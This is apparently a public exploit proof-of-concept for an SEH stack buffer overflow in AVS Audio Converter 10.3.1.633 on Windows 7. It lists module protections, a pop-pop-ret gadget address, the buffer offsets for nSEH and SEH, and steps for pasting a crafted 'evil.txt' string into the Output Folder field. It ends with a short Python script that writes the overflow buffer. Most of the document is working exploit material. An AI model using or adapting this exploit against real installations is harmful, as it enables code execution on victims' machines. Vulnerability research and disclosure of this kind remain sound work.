# Exploit Title: AVS Audio Converter 10.3 - Stack Overflow (SEH)
# Discovered by: Yehia Elghaly - Mrvar0x
# Discovered Date: 2022-10-16
# Tested Version: 10.3.1.633
# Tested on OS: Windows 7 Professional x86

#pop+ret Address=005154E6
#Message=  0x005154e6 : pop ecx # pop ebp # ret 0x04 | startnull {PAGE_EXECUTE_READ} [AVSAudioConverter.exe] 
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v10.3.1.633 (C:\Program Files\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)

# The only module that has SafeSEH disabled.
# Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | 
# 0x00400000 | 0x01003000 | False  | False   | False |  False   | False  |

#Allocating 4-bytes for nSEH which should be placed directly before SEH which also takes up 4-bytes.

#Buffer  = '\x41'* 260
#nSEH    = '\x42'*4
#SEH     = '\x43'*4
#ESI     = 'D*44' # ESI Overwrite 

#buffer = "A"*260 + [nSEH] + [SEH] + "D"*44
#buffer = "A"*260 + "B"*4 + "\xE6\x54\x51\x05" + "D"*44


# Rexploit:
# Generate the 'evil.txt' payload using python 2.7.x on Linux.
# Open the file 'evil.txt' Copy.
# Paste at'Output Folder and click 'Browse'.

#!/usr/bin/python -w
  
filename="evil.txt"
 
buffer = "A"*260 + "B"*4 + "C"*4 + "D"*44
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()